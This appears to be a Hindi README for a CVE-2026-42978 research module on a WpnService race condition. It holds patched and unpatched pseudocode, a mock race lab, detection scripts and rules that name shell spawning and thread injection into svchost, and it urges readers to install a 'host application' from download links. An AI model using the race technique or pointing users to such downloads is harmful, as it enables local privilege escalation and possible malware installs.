
CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free और Race Condition PoC अनुसंधान, नैदानिक स्कैनर, और AI Security Tool के लिए सुरक्षा ऑडिट मॉड्यूल।
CVE-2026-42978
AI सुरक्षा टूल के लिए Windows पुश नोटिफिकेशन मॉड्यूल
नेक्स्ट-जेन AI सुरक्षा इकोसिस्टम, मल्टी-प्रोटोकॉल टर्मिनल और स्वायत्त एजेंट सूट
वेबसाइट · उत्पाद दस्तावेज़ · होस्ट एप्लिकेशन · कम्युनिटी चैट
वेबसाइट नेविगेशन: होम · अपडेट · डाउनलोड · मॉड्यूल
उत्पाद: AI Security Tool
साइट: zerodayevil.github.io
दस्तावेज़: https://zerodayevil.github.io/ai-security-tool
यह मॉड्यूल AI Security Tool के लिए एक समीक्षित राइट-अप और एक सुरक्षित चेक प्रोफ़ाइल है।
केवल प्रोजेक्ट साइट या आधिकारिक कैटलॉग में सूचीबद्ध मॉड्यूल का उपयोग करें। इस मॉड्यूल को स्वीकृत एप्लिकेशन के भीतर लोड करें, उन एंडपॉइंट्स के विरुद्ध जिनका आप स्वामी हैं या जिनका मूल्यांकन करने के लिए आपके पास लिखित अधिकार है।
यह रिपॉज़िटरी WpnService के विरुद्ध कोई हथियारबंद एक्सप्लॉइट प्रदान नहीं करती। lab/ के अंतर्गत लैब बग के वर्ग (TOCTOU / डबल-फ़ेच) का एक स्टैंडअलोन मॉक है। यह वास्तविक पुश-नोटिफिकेशन सेवा से संवाद नहीं करता।
पहले होस्ट एप्लिकेशन इंस्टॉल करें। फिर Modules → Windows / Local EoP → CVE-2026-42978 से इस मॉड्यूल को सक्षम करें।
केवल आधिकारिक स्रोत:
CVE-2026-42978 Windows पुश नोटिफिकेशन में एक स्थानीय विशेषाधिकार उन्नयन है। Microsoft उचित सिंक्रोनाइज़ेशन के बिना साझा संसाधन तक समवर्ती पहुँच का वर्णन करता है (CWE-362)। पैच किए गए बनाम अपैच किए गए wpncore.dll पर शोध प्लेटफ़ॉर्म शटडाउन के दौरान PresentationEndpointFacade में एक यूज़-आफ्टर-फ़्री रेस दिखाता है।
WpnService सत्र 0 में NT AUTHORITY\SYSTEM (svchost.exe -k netsvcs -p) के रूप में चलता है। टोस्ट, टाइल और बैज डिलीवरी इसके माध्यम से होती है। उस प्रक्रिया के विरुद्ध जीती गई रेस स्थानीय मशीन पर एक SYSTEM समस्या है — रिमोट प्री-ऑथ DC बग नहीं।
स्थिति: 10 जून 2026 (Patch Tuesday) को पैच किया गया। यह पृष्ठ रक्षात्मक शोध है।
यह CVE-2026-41089 (Netlogon RCE) नहीं है। भिन्न घटक, भिन्न विशेषाधिकार मॉडल, भिन्न पैच तिथि।
क्लाइंट और सर्वर SKU जो Push Notifications प्रदान करते हैं। टिकट बंद करने से पहले MSRC पर सटीक KB की पुष्टि करें।
| परिवार | नोट्स |
|---|---|
| Windows 10 | 1809, 21H2, 22H2 (x86 / x64 / ARM64 जैसा लागू हो) |
| Windows 11 | 23H2, 24H2, 25H2, 26H1 |
| Windows Server | 2016 / 2019 / 2022 / 2025 (पूर्ण और Server Core जहाँ घटक मौजूद है) |
सार्वजनिक सर्विसिंग नोट्स से अभिविन्यास बिल्ड (हमेशा MSRC पुनः जाँचें):
फ़साड नोटिफिकेशन API कॉल को रैप करता है और PresentationEndpointImpl को प्रतिनिधि बनाता है। प्लेटफ़ॉर्म शटडाउन के दौरान NotificationPlatform ऑब्जेक्ट नष्ट हो जाता है। कई फ़साड विधियों ने ऐतिहासिक रूप से शटडाउन फ़्लैग या साझा लॉक के बिना प्लेटफ़ॉर्म पॉइंटर लिया। यदि टियरडाउन रेस जीत जाता है, तो अगली कॉल एक डैंगलिंग पॉइंटर का उपयोग करती है।
वही लॉक-एंड-गार्ड पैटर्न 49 PresentationEndpointFacade::* विधियों में लागू किया गया था। नीचे की कार्यान्वयन विधियों को यथावत छोड़ दिया गया — छेद फ़साड पर था।
wpncore.dll 26100.8521)// PresentationEndpointFacade::ToastUnblockAll — unpatched
long ToastUnblockAll(PresentationEndpointFacade *this) {
NotificationPlatformHandle::Get(this + 0x50);
if (platform == NULL)
Throw_Hr(...);
return PresentationEndpointImpl::UnblockToastsForEachApp(...);
}
wpncore.dll 26100.8655)// PresentationEndpointFacade::ToastUnblockAll — patched
long ToastUnblockAll(PresentationEndpointFacade *this) {
if (Feature_4097557817::IsEnabled()) {
AcquireSRWLockShared(&Wns::s_platformLock);
if (Wns::s_platformShutdown)
Throw_Hr(E_APPLICATION_EXITING);
NotificationPlatformHandle::Get(this + 0x50);
ReleaseSRWLockShared(&Wns::s_platformLock);
}
}
पैच क्या जोड़ता है:
AcquireSRWLockShared — रीडर्स-राइटर्स लॉक; शटडाउन एक्सक्लूसिव लेता है।s_platformShutdown — यदि टियरडाउन शुरू हो गया है तो E_APPLICATION_EXITING के साथ बाहर निकलें।unique_storage के माध्यम से RAII रिलीज़, ताकि अपवाद पथों पर लॉक छूट जाए।Feature_4097557817।reports/ से PE नोट्स:
.text 18,432 बाइट्स बढ़ा.data 96 बाइट्स बढ़ा (Wns::s_platformLock, Wns::s_platformShutdown)WpnService SYSTEM है। यदि रेस जीत ली जाती है, तो एक डैंगलिंग vtable कॉल को स्थानीय SYSTEM कोड निष्पादन में बदला जा सकता है। वह चरण — हीप स्प्रे, vtable हाईजैक, पेलोड — यहाँ दायरे से बाहर है।
यह मॉड्यूल मूल-कारण साक्षरता, पैच सत्यापन, और डिटेक्शन के लिए है।
detection/) को लैब बॉक्स पर एकत्र करें।उत्पादन WpnService के विरुद्ध क्रैश या रेस लूप न चलाएँ।
authorized operator
│
▼
AI Security Tool → module 42978
│
▼
authorized Windows endpoint
│
├─ patch / wpncore.dll age
└─ SIEM / Sysmon / Event Log notes
lab/ डबल-फ़ेच / TOCTOU का एक स्टैंडअलोन C डेमो है। यह एक नामित पाइप और साझा मेमोरी का उपयोग करता है। यह wpncore.dll लोड नहीं करता और WpnService को शुरू या बंद नहीं करता।
vulnerable_service.exe — एक लंबाई को मान्य करता है, सोता है, लंबाई को फिर से पढ़ता है।race_attacker.exe — उस विंडो के दौरान साझा मान को फ़्लिप करता है।--patched — एक स्थानीय वेरिएबल में सिंगल-फ़ेच; वही हमलावर शून्य रेस देखना चाहिए।GCC (MinGW) आवश्यक है। lab/ से:
build.bat
टर्मिनल 1: vulnerable_service.exe
टर्मिनल 2: race_attacker.exe 5
फिर vulnerable_service.exe --patched के साथ तुलना करें।
detection/etw_wpn_monitor.ps1सात जाँचें:
WpnService स्थिति और PIDwpncore.dll तिथि / बिल्ड)powershell -ExecutionPolicy Bypass .\detection\etw_wpn_monitor.ps1
detection/sysmon_wpn_race_detect.xmlsysmon64.exe -accepteula -i detection\sysmon_wpn_race_detect.xml
चैनल: Microsoft-Windows-PushNotifications-Platform/Operational
wpncore.dll बिल्ड उस शाखा के पैच किए गए रो से मेल खाता हैsvchost -k netsvcs द्वारा शेल स्पॉन करने पर अलर्टयदि etw_wpn_monitor.ps1 अपैच कहता है — जून 2026 अपडेट इंस्टॉल करें और पुनः जाँचें।
CVE-2026-42978/
├── README.md
├── LICENSE
├── lab/
│ ├── vulnerable_service.c
│ ├── race_attacker.c
│ └── build.bat
├── detection/
│ ├── etw_wpn_monitor.ps1
│ └── sysmon_wpn_race_detect.xml
└── reports/
├── PE_DIFF_REPORT.txt
└── FUNCTION_DIFF_REPORT.txt
आवश्यकताएँ: डिटेक्शन स्क्रिप्ट के लिए Windows 10/11 · मॉक लैब के लिए MinGW · Sysmon वैकल्पिक।
इस README में स्क्रीनशॉट सार्वजनिक इमेज URL से लोड होते हैं। वे इस ट्री में संग्रहीत नहीं हैं।
4 modules@ZeroDayEvil@ZeroDayEvil@ZeroDayEvil@ZeroDayVPN2 modules@ZeroDayVPN@ZeroDayEvil2 modules@ZeroDayEvil@ZeroDayVPNउपयोगी कार्य:
ऐसा PR न खोलें जो हथियारबंद WpnService एक्सप्लॉइट, हीप-स्प्रे हेल्पर, या लाइव सेवा के विरुद्ध एक्सप्लॉइट PoC जोड़ता हो।
MIT License के अंतर्गत जारी। देखें LICENSE।
केवल अधिकृत रक्षात्मक शोध और सिस्टम प्रशासन।
लिखित प्राधिकरण के बिना स्थानीय विशेषाधिकार-उन्नयन परीक्षण अवैध है।
कमज़ोरी पैच कर दी गई है। Windows को अद्यतन रखें। इस रिपॉज़िटरी में लाइव सेवा के विरुद्ध हथियारबंद एक्सप्लॉइट शामिल नहीं है।
AI Security Tool — साइबर सुरक्षा पेशेवरों के लिए टर्मिनल वर्कफ़्लो और ऑटोमेशन।
zerodayevil.github.io के लिए रक्षात्मक मॉड्यूल · कोई स्टैंडअलोन WpnService एक्सप्लॉइट नहीं · MSRC पर तथ्य सत्यापित करें
| OS / प्लेटफ़ॉर्म | संस्करण | आर्किटेक्चर / प्रारूप | अद्यतन | स्थिति | डाउनलोड |
|---|
| Windows | v6.3.20 | x64 इंस्टॉलर (.exe) | 2026-09-08 | नवीनतम | Download .exe |
| Windows | v6.3.20 | x64 पोर्टेबल (.tar.gz) | 2026-09-08 | नवीनतम | Download .tar.gz |
| macOS | v5.3.29 | Apple Silicon (.dmg) | 2026-09-05 | स्थिर | Download .dmg |
| Linux | v5.3.27 | यूनिवर्सल x64 (.tar.gz) | 2026-09-01 | स्थिर | Download .tar.gz |
| Android | v5.3.27 | ARM64 APK (.apk) | 2026-09-01 | स्थिर | Download .apk |
| फ़ील्ड | मान |
|---|
| CVE | CVE-2026-42978 |
| BDU | BDU:2026-08249 |
| विक्रेता सलाह | MSRC — Windows Push Notifications EoP |
| गंभीरता | उच्च · CVSS 3.1 7.8 |
| कमज़ोरी | CWE-362 रेस कंडीशन · शटडाउन पथ पर यूज़-आफ्टर-फ़्री |
| घटक | Windows Push Notifications · WpnService · wpncore.dll |
| हमला वेक्टर | स्थानीय |
| आवश्यक विशेषाधिकार | निम्न (अधिकृत स्थानीय उपयोगकर्ता) |
| उपयोगकर्ता इंटरैक्शन | कोई नहीं |
| Patch Tuesday | 10 जून 2026 |
| मॉड्यूल प्रकार | शोध राइट-अप + इन-ऐप सुरक्षित चेक + डिटेक्शन पैक |
| शाखा | सांकेतिक पैच किया गया बिल्ड |
|---|
| Windows 11 23H2 | 22631.7219 |
| Windows 11 24H2 | 26100.8655 |
| Windows 11 25H2 | 26200.8655 |
| Windows 11 26H1 | 28000.2269 |
wpncore.dll उदाहरण (24H2) | कमज़ोर 26100.8521 → पैच किया गया 26100.8655 |
| श्रेणी | उदाहरण फ़ंक्शन |
|---|
| Toast | ToastUnblockAll, ToastCreateSession, ToastCloseSession, ToastRequestAllNotifications, ToastSuppress |
| Tile | TileCreateSession, TileCloseSession, TileRequestResourceForeground |
| Registration | RegisterApplication, UnregisterApplication, RegisterHandler, UpdateRegistration |
| Settings | ChangeAppSetting, QueryAppSetting, QueryGlobalSetting |
| Delivery | Deliver, GetPayloadForNotificationId, Submit, PostScheduledNotification |
| Queries | GetRegisteredHandler, GetSettingsFromHandler, GetAssetsFromHandler |
| नियम | यह किसके लिए है |
|---|
WPN_EoP_ChildProcess | svchost (netsvcs) द्वारा cmd / powershell / wscript स्पॉन करना |
WPN_PipeAccess | WPN-संबंधित नामित पाइप से कनेक्शन |
WPN_FileCreation | नोटिफिकेशन डेटा निर्देशिकाओं के अंतर्गत फ़ाइल निर्माण |
WPN_RegistryTampering | PushNotifications कुंजियों के अंतर्गत लेखन |
WPN_ProcessAccess | svchost के लिए PROCESS_ALL_ACCESS |
WPN_ThreadInjection | svchost में CreateRemoteThread |
| CVE | वर्ग |
|---|
| CVE-2026-42977 | EoP · रेस |
| CVE-2026-42978 | EoP · रेस (यह मॉड्यूल) |
| CVE-2026-42979 | EoP · रेस |
| CVE-2026-42991 | EoP · रेस |
| CVE-2026-42969 | सूचना प्रकटीकरण · रेस |
| CVE-2026-42970 | सूचना प्रकटीकरण · रेस |
| CVE-2026-42973 | सूचना प्रकटीकरण · रेस |
| CVE-2026-26167 | EoP |
| CVE-2026-32160 | EoP |